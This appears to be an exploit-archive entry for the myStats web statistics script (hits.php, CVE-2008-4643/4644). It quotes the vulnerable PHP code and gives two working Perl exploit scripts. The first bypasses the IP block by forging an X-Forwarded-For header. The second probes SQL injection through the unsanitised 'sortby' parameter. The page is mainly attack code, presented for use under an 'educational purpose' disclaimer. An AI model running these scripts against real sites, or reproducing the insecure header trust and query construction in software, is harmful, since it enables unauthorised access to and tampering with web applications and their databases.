myStats (hits.php) Multiple Remote Vulnerabilities Exploit

2008.10.22
Credit: JosS
Risk: High
Local: No
Remote: Yes
CVE: CVE-2008-4643 | CVE-2008-4644
CWE: CWE-89

# myStats (hits.php) Multiple Remote Vulnerabilities Exploit # url: http://mywebland.com/ # # Author: JosS # mail: sys-project[at]hotmail[dot]com # site: http://spanish-hackers.com # team: Spanish Hackers Team - [SHT] # # This was written for educational purpose. Use it at your own risk. # Author will be not responsible for any damage. # # Greetz To: All Hackers and milw0rm website --------------------- Break System Block IP --------------------- <<hits.php>> 7: if (@getenv("HTTP_X_FORWARDED_FOR")) { $u_ip = @getenv("HTTP_X_FORWARDED_FOR"); } else { $u_ip = @getenv("REMOTE_ADDR"); } if ($u_ip == BLOCK_IP) { return 1; 13: exit; } <<config.php>> 11: define("BLOCK_IP", "127.0.0.1"); <<exploit.pl>> use HTTP::Request; use LWP::UserAgent; my $web="http://localhost/hits.php"; my $ua=LWP::UserAgent->new(); $ua->default_header('X-Forwarded-For' => "127.1.1.1"); my $respuesta=HTTP::Request->new(GET=>$web); $ua->timeout(30); my $response=$ua->request($respuesta); $contenido=$response->content; if ($response->is_success) { open(FILE,">>results.txt"); print FILE "$contenido\n"; close(FILE); print "\n[+] Exploit Succesful!\n\n"; } else { print "\n[-] Exploit Failed!\n\n"; } <<proof of concept>> $ua->default_header('X-Forwarded-For' => "127.1.1.1"); --> BREAK BLOCK_IP ------------- SQL Injection ------------- <<hits.php>> 63: if (isset($_GET['sortby'])) {$sortby = $_GET['sortby'];} else { $sortby = 'timestamp' ;} $sql = "SELECT * FROM " . LOG_TBL . " ORDER BY " . $sortby." DESC LIMIT 0, ". DISPLAY_LOG_NO ; 69: $querylog = mysql_query($sql) or die("Line 117 Cannot query the database.<br>" . mysql_error()); <<exploit.pl>> use HTTP::Request; use LWP::UserAgent; my $web="http://localhost/hits.php?sortby=1'"; my $ua=LWP::UserAgent->new(); my $respuesta=HTTP::Request->new(GET=>$web); $ua->timeout(30); my $response=$ua->request($respuesta); $contenido=$response->content; if ($response->is_success) { if($contenido =~ /You have an error in your SQL syntax;/) { print "\n[+] Exploit Succesful!\n"; print "\n[+] Content:\n"; print "$contenido\n\n"; } } else { print "\n[-] Exploit Failed!\n\n"; }

References:

http://www.securityfocus.com/bid/31772
http://www.milw0rm.com/exploits/6759
http://secunia.com/advisories/32289


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top